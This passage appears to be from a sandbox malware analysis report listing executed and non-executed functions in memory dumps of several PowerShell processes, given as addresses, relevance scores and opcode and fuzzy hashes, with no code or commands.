Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8

Analysis Process: powershell.exePID: 6684, Parent PID: 3880COMMON

Executed Functions

Function 00007FFD34844073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377751556.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34840000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f22231061b7c46bca815dc5500b3f1556228ec92d8f5b071ab4f3f535526bf
Instruction ID: be2c3fe4c9209fb5d4d9b3ea25328e98cccf23cee6d2c2f89497b90862d738e3
Opcode Fuzzy Hash: 02f22231061b7c46bca815dc5500b3f1556228ec92d8f5b071ab4f3f535526bf
Instruction Fuzzy Hash: 4B512522B0DE9A0FE7E9DB1C44A117477D2EF9A720B1801BAC24EC7393DD18EC158341

Function 00007FFD34779748 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377288300.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b813e6994b377a2515103f08dd877ab3c5406795ee605e78da453b754f177b
Instruction ID: 4766a64e325c3549a3dd43cacf73390bc247576ba3779c709fcddc9dab550dba
Opcode Fuzzy Hash: e0b813e6994b377a2515103f08dd877ab3c5406795ee605e78da453b754f177b
Instruction Fuzzy Hash: 66410671A1DB888FEB089F5C9C5A6A97BE0FB95311F00416FE049C3252DA64B856CBC2

Function 00007FFD3477A49C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377288300.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2cce8641d86e549bf8c81561d82bff36c757327e2ecd8669ca58d3c0f589f5
Instruction ID: a3d02055cab902868b8f64a936cb561dc1102ae4d92fd9d734824d96320e15d4
Opcode Fuzzy Hash: bb2cce8641d86e549bf8c81561d82bff36c757327e2ecd8669ca58d3c0f589f5
Instruction Fuzzy Hash: A521063190CB4C8FEB59DBAC9C4A7E97FE0EB96321F04416BD048C3152DA75A816CB92

Function 00007FFD348440BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377751556.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34840000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d72c7ce0cdcb4ce547d72e2b3393da9678f18df2ff7a11554b09bd1db1e368e
Instruction ID: c976631e37ad60156d969bb95d5fc31c98e0de0fd8ebc5c9ca742fc020240f0d
Opcode Fuzzy Hash: 1d72c7ce0cdcb4ce547d72e2b3393da9678f18df2ff7a11554b09bd1db1e368e
Instruction Fuzzy Hash: B821D023B0EA974FE7E9DB1844B117466D2EF6A714B5901BAD24EC73A3CE2CEC149301

Function 00007FFD3484681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377751556.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34840000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc120fa896c26b7aa0e1e81f405f54f1f3a662688459dd55c238861bde43faf8
Instruction ID: 05a5f9c747fefc10e1660c34fd8e80ee1659bd8927824b29764c4762f1264cb1
Opcode Fuzzy Hash: fc120fa896c26b7aa0e1e81f405f54f1f3a662688459dd55c238861bde43faf8
Instruction Fuzzy Hash: F8110A32B0D6894FE791DF9840E4568BBD1EF5A320F0440BFC54DE7293D92C5845D310

Function 00007FFD348443CA Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377751556.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34840000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f67183c2192830f6d0d692aa3cbddbb0f870a6a2fb949d9c30815bbf6871db
Instruction ID: b815b2b777c87657583f15b613db95544af0d109f8ce2f80038c3871542ad4e8
Opcode Fuzzy Hash: 98f67183c2192830f6d0d692aa3cbddbb0f870a6a2fb949d9c30815bbf6871db
Instruction Fuzzy Hash: EE11E532B0E9854FD6A1D71C94A49B87BD1EF4AB2471900F6D15DD7293D91EAC14C341

Function 00007FFD3465EEC1 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2376833385.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd3465d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d7a7677ac3fe8a35765000e0d0f98024984640490254c00b4233e819b6e799
Instruction ID: 0f8c4590eee341ef193612dcc2fcdcd045e454ab6166ff580ba622aa079f7449
Opcode Fuzzy Hash: f1d7a7677ac3fe8a35765000e0d0f98024984640490254c00b4233e819b6e799
Instruction Fuzzy Hash: 9F01623160CE088F9FA4EF1DE48599637E1FB98320710069AD41EC7559D735F891CBC1

Function 00007FFD347733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377288300.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 2cc47b0ba0fdde9b7c4ba52e5ec4494637230a7301f5fb9479e41aed1cd45b64
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 6D01677121CB0C8FD754EF0CE451AB5B7E0FB95364F50056DE58AC3691DA36E882CB45

Function 00007FFD34779CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2377288300.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34770000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e1df9a545bfc95ebecfeb27c0746cb58373f28f2eaa4945de2f0c05b1aa084
Instruction ID: e2dc8ef1aa6af1968f48fa38e2c9a4d84300e8dd8e24bee8d2005983a7f49ffd
Opcode Fuzzy Hash: f6e1df9a545bfc95ebecfeb27c0746cb58373f28f2eaa4945de2f0c05b1aa084
Instruction Fuzzy Hash: 87F02B718086898FEB46DF288C594E57FE0EF17310F05429BD548C70A2DB65A458CBC2

Non-executed Functions

Function 00007FFD347785D3 Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD347785C2
N_^, xrefs: 00007FFD34778562
N_^, xrefs: 00007FFD3477867A
N_^, xrefs: 00007FFD34778572

Memory Dump Source

Source File: 00000019.00000002.2377288300.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd34770000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 246cabff7efd97b6cb8bc808151d5355dafa9c009befe09b0e35428e085ccc8b
Instruction ID: 79c1c2410674bc2cb0f9b331392902bb9c1fb02b384e1c762485ff83f8218098
Opcode Fuzzy Hash: 246cabff7efd97b6cb8bc808151d5355dafa9c009befe09b0e35428e085ccc8b
Instruction Fuzzy Hash: 09610793E0EBC29BE35242298CF51A53FD0EF13364B5A44F6C789CB183EC5D38469292

Analysis Process: powershell.exePID: 5648, Parent PID: 3880COMMON

Executed Functions

Function 00007FFD3479604D Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408e2b9af51cfcf9a8a2d6d47bfc3178fdb0475a0ca2a087e714124de181a90b
Instruction ID: 79850e42ad741a5af9d77e69f5e659f81ab90a7f70c64ac481c599fbbbf207d5
Opcode Fuzzy Hash: 408e2b9af51cfcf9a8a2d6d47bfc3178fdb0475a0ca2a087e714124de181a90b
Instruction Fuzzy Hash: 03C1A897B0CA935BE321A7AC68B70FE3BA4DF532797080277D288C9063DD1D645B92D1

Function 00007FFD34799708 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

WC, xrefs: 00007FFD34799775

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: WC
API String ID: 0-992537601
Opcode ID: 7d63ca819aecdee0ddf350cfc59e2c0d2498329d1512fb24ee614ecd7e62891e
Instruction ID: 8bd947338d0556fe28bd6b6d31c101d9282f8fa5862bb165a87205384fa29dd1
Opcode Fuzzy Hash: 7d63ca819aecdee0ddf350cfc59e2c0d2498329d1512fb24ee614ecd7e62891e
Instruction Fuzzy Hash: F551FBB190DAC89FEB159B1C5C5A2A97BE0FB56310F04417FD18983293DE34A856CBC2

Function 00007FFD3479A838 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e5fa461366ce5533d1c2470a6cb6122a941872c3cb18fc7422f5837509441d
Instruction ID: 0bdb6fe82b680d15e91c539e4094b8c42124d21cda71784a904da0749412cd75
Opcode Fuzzy Hash: f4e5fa461366ce5533d1c2470a6cb6122a941872c3cb18fc7422f5837509441d
Instruction Fuzzy Hash: 9351277160DBC59FE74ADB28C8E58647BE0FF57324B1801AED589C71A3EA29B807C741

Function 00007FFD34793428 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f874d232dae3207a03a9f0d706a831e536a5cccd84a23ae2df9501405817b4
Instruction ID: 5cffe337bb8afba90664053a5ea590646e4aa774ff590d433290537c889843f1
Opcode Fuzzy Hash: 99f874d232dae3207a03a9f0d706a831e536a5cccd84a23ae2df9501405817b4
Instruction Fuzzy Hash: 6D41B36660E7C28FE753876858B60E93FB0EF4722070A01EBC5D4CB0A3D9196807D7A2

Function 00007FFD3467ED40 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2507383323.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd3467d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cf618178a83a107c9ebc8b93eca9eceaac6a40a1218f5ec7c926883eb4abe2
Instruction ID: db4053749aed92d965563a32e5529a15b4a325e77329220a6fff1b5d4e387aac
Opcode Fuzzy Hash: f7cf618178a83a107c9ebc8b93eca9eceaac6a40a1218f5ec7c926883eb4abe2
Instruction Fuzzy Hash: 6E41F37040DBC44FE7569B29DC959A23FF0EF57320B1946DFD088CB1A3D629A84AC792

Function 00007FFD3479A778 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9ba382f2400501fc170c23a3bc7e527391b6f5be39b32b01e695138b06961d
Instruction ID: 212252019440f71b24d3251802d0fc5707b1e00ea18e4dc222eba388030049e1
Opcode Fuzzy Hash: 4d9ba382f2400501fc170c23a3bc7e527391b6f5be39b32b01e695138b06961d
Instruction Fuzzy Hash: 1521F27090CA4C8FDB58DF9C984A7FA7BE0EB96321F04816FD049C3112D674A856CB92

Function 00007FFD3486681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2513337275.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba6d4acadbc30a9f159bdd78154fb332fc3b3ac76976379eeb9c9c3877b88b2
Instruction ID: e0e5e66f5fbfce5b48c4859ee778a8dda32b5ec92d1d8cf0e7d93abe845cdc13
Opcode Fuzzy Hash: 2ba6d4acadbc30a9f159bdd78154fb332fc3b3ac76976379eeb9c9c3877b88b2
Instruction Fuzzy Hash: EE11E332B0D6C94FEBD1DFA880A45A87BD1EF5A320F4440BFC64DE7193DA28A845D350

Function 00007FFD347933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 7f35bd5044578bf9c0f8abe52516a2319000a2064556ee323e06116b507f2bf6
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 6701677125CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E882CB45

Function 00007FFD34799CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405c58cac63e2ca5b0471ce8020c09ca8eec23c1979971a646614c44ae6965e8
Instruction ID: b8fca14fb8e1cd8cf1e106e19a155d4257aea9d9582281c92986d37bd135a305
Opcode Fuzzy Hash: 405c58cac63e2ca5b0471ce8020c09ca8eec23c1979971a646614c44ae6965e8
Instruction Fuzzy Hash: 97F0BB718086898FEB46DF2888595D5BFA0EF57310F050297D458C71A2DB65A558CBC2

Function 00007FFD3486414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2513337275.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508ea48616a51fb25ec524fe536c027f2d5deb6276aa42ed841fed17b9faa5c4
Instruction ID: 6e637dc0419a70d2d62ba7f5fea8be4d64e0c46e6ea5219b2a99bf7e3ab1fee8
Opcode Fuzzy Hash: 508ea48616a51fb25ec524fe536c027f2d5deb6276aa42ed841fed17b9faa5c4
Instruction Fuzzy Hash: 68F0BE32B0CA048FD7A9EB4CE4904E873E1EF5633075100BAE25DCB163CA2AEC40CB44

Function 00007FFD34864400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2513337275.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e4aae9fab1e403a3aea591443ef1b42e89e85084f1046eb34f19caa9d49aaf
Instruction ID: e925af30dd54644d6ac212ea00d1de0ec528806acaa935565170f93787b07be0
Opcode Fuzzy Hash: b9e4aae9fab1e403a3aea591443ef1b42e89e85084f1046eb34f19caa9d49aaf
Instruction Fuzzy Hash: F3F0BE32A0D5448FD795EB4CE0914E873E0FF06724B8100B6E24DCB163DA2AAC40C780

Function 00007FFD348641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2513337275.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: ee9586f07496c1bd1986fd336a253b726326e321646279f7fa3f18427cd421a5
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 56E01A31B0C8188FDAA8DB0CE0909ED73E1EB9933175101B7D24EC7561CA2AEC519B84

Non-executed Functions

Function 00007FFD347984F2 Relevance: 7.6, Strings: 6, Instructions: 138COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD347984F2
L_^, xrefs: 00007FFD34798522
L_^, xrefs: 00007FFD3479862A
L_^, xrefs: 00007FFD347985C9
L_^, xrefs: 00007FFD34798562
L_^, xrefs: 00007FFD34798512

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^$L_^
API String ID: 0-1652487901
Opcode ID: 4b54e0d848f73aad2a8c291d8984418f31556413b8aba2aec53839bc8cb73ee0
Instruction ID: d25c5df154bf7e3fe79113273107b2414c65c828bd5e5f5f0e0734dfea23e69d
Opcode Fuzzy Hash: 4b54e0d848f73aad2a8c291d8984418f31556413b8aba2aec53839bc8cb73ee0
Instruction Fuzzy Hash: EE41B6A3A1DAC25BD753463988FA0D57FD0EE1321870A15F6C2E58B053EE1C380BA692

Function 00007FFD34798BD3 Relevance: 7.6, Strings: 6, Instructions: 108COMMON

Download Yara Rule

Strings

L_^K, xrefs: 00007FFD34798C62
L_^T, xrefs: 00007FFD34798C8A
L_^@, xrefs: 00007FFD34798C2A
L_^?, xrefs: 00007FFD34798C22
L_^Y, xrefs: 00007FFD34798CB2
L_^N, xrefs: 00007FFD34798C6A

Memory Dump Source

Source File: 0000001E.00000002.2512344474.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^?$L_^@$L_^K$L_^N$L_^T$L_^Y
API String ID: 0-2042962386
Opcode ID: 371a7bd3d2f53567e8b9be30136cbf095641841c0e609494d3dcefb21d544016
Instruction ID: 3d9d47c374a5d7e3eddbb3276b7fb1488aba2a282be23ba51e92218ae5b941bf
Opcode Fuzzy Hash: 371a7bd3d2f53567e8b9be30136cbf095641841c0e609494d3dcefb21d544016
Instruction Fuzzy Hash: 7F2121A37188261AC21236FDBC139FD3748DF9627934452F3E258DE153DE14B09B86D1

Analysis Process: powershell.exePID: 5776, Parent PID: 3880COMMON

Executed Functions

Function 00007FFD347996FA Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2676513982.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2bd0e6be0d0af3145b7fc2ec11996b66247a1ccf27e18a4d112aab1fb53774
Instruction ID: 25441014289d69c4a9d3a81ab7d0fabbd96b07ff5ba7cda9b8149b5f2144de04
Opcode Fuzzy Hash: 8a2bd0e6be0d0af3145b7fc2ec11996b66247a1ccf27e18a4d112aab1fb53774
Instruction Fuzzy Hash: 786117B2A0DB859FE7059B5C58A61E87FE0FF52310F08417FD18987293DA29B8158BC2

Function 00007FFD34864073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2678132818.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb06b5b50454777c5ff63d4c0c04f3d7cd09ff5c04b0863c6f227d1b0d530de
Instruction ID: 90955e9a5321639c2eac3e05b3d2dbc0d27e619fc9268acfa8ed05022c25cd91
Opcode Fuzzy Hash: cdb06b5b50454777c5ff63d4c0c04f3d7cd09ff5c04b0863c6f227d1b0d530de
Instruction Fuzzy Hash: D9511622B0DA9A4FE7E99B1C54A117877D2EF96630B9801BAC34EC7293DD1CE8058745

Function 00007FFD3467ED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2675626838.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd3467d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d187e6e65dcc268f6a615e784ce74fe4a24011c05f6adadfdc4aa16836713a34
Instruction ID: e681ee2294e108106211731d45b637792bd05099fda1522aea7f82cf1ae35cd7
Opcode Fuzzy Hash: d187e6e65dcc268f6a615e784ce74fe4a24011c05f6adadfdc4aa16836713a34
Instruction Fuzzy Hash: 3A41F17140DBC44FE756DB28DC959923FF0EF57220B1946DFD088CB1A3D629A84AC7A2

Function 00007FFD3479B605 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2676513982.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a716f6f55d7537df96e347c0e52f495565a545fc66d2c706ab72963a53321d0
Instruction ID: 437c614b44a7042184c1be4a202324b8c4edd1c766889ff6ee3820476817231a
Opcode Fuzzy Hash: 9a716f6f55d7537df96e347c0e52f495565a545fc66d2c706ab72963a53321d0
Instruction Fuzzy Hash: D731F67190C78C4FDB55DF68884A6E97FF0EF97320F0441ABD048C7163D668A81AC792

Function 00007FFD348640BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2678132818.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d142d7258219f33a5a3ee0a13a14d05197929d037d71e1ba0232c6af316ead2
Instruction ID: 7dec0ba8c6327069750974c0adfa44c56cd58da265e8eae52ae690be066ee2b1
Opcode Fuzzy Hash: 3d142d7258219f33a5a3ee0a13a14d05197929d037d71e1ba0232c6af316ead2
Instruction Fuzzy Hash: DA21D223B0DAA74FE7E5EB1844B117866D2EF56630B8901BAD34DC71A3CD2CEC449709

Function 00007FFD3479B64C Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2676513982.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232a93be8fecda9014354aae14be2810b75c0734c8215562e7db02808df60845
Instruction ID: 6a1c14aef9fdca051051a44aae2a33e07e03c428a1b8b4c6ab10b89be45710a8
Opcode Fuzzy Hash: 232a93be8fecda9014354aae14be2810b75c0734c8215562e7db02808df60845
Instruction Fuzzy Hash: B221C27190CB4C8FDB58DF9C984A7E97BE0EB96321F00816FD049C3152D674A85ACB92

Function 00007FFD3486681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2678132818.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3147f6845679148ae6104c35f9938613b5794f05adc40df439962986010c90c
Instruction ID: 14a4071ea85e932cb840dd1719b7eaeae44e1fa7a4da5c902a7597fb74c598fa
Opcode Fuzzy Hash: f3147f6845679148ae6104c35f9938613b5794f05adc40df439962986010c90c
Instruction Fuzzy Hash: 2E11E332B0D6C94FEBD1DFA880A45A87BD1EF5A320F4440BFC64DE7193DA28A845D350

Function 00007FFD348643CA Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2678132818.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d615fab94bc20b010ffebf18a901778964ffba637053e41054b564e097c056f1
Instruction ID: 3e3c4562150e5830966b3a3861984d14ba475bd11454083101e4162ccfa53e29
Opcode Fuzzy Hash: d615fab94bc20b010ffebf18a901778964ffba637053e41054b564e097c056f1
Instruction Fuzzy Hash: BB112532A0E9850FD6E1D71C50A58BC7BD1EF4262078800F6D65CDB193D91DAC00C345

Function 00007FFD347933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2676513982.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 7f35bd5044578bf9c0f8abe52516a2319000a2064556ee323e06116b507f2bf6
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 6701677125CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E882CB45

Function 00007FFD34799CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2676513982.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405c58cac63e2ca5b0471ce8020c09ca8eec23c1979971a646614c44ae6965e8
Instruction ID: b8fca14fb8e1cd8cf1e106e19a155d4257aea9d9582281c92986d37bd135a305
Opcode Fuzzy Hash: 405c58cac63e2ca5b0471ce8020c09ca8eec23c1979971a646614c44ae6965e8
Instruction Fuzzy Hash: 97F0BB718086898FEB46DF2888595D5BFA0EF57310F050297D458C71A2DB65A558CBC2

Non-executed Functions

Function 00007FFD347985D3 Relevance: 5.2, Strings: 4, Instructions: 224COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD34798572
L_^, xrefs: 00007FFD347985C2
L_^, xrefs: 00007FFD34798562
L_^, xrefs: 00007FFD3479867A

Memory Dump Source

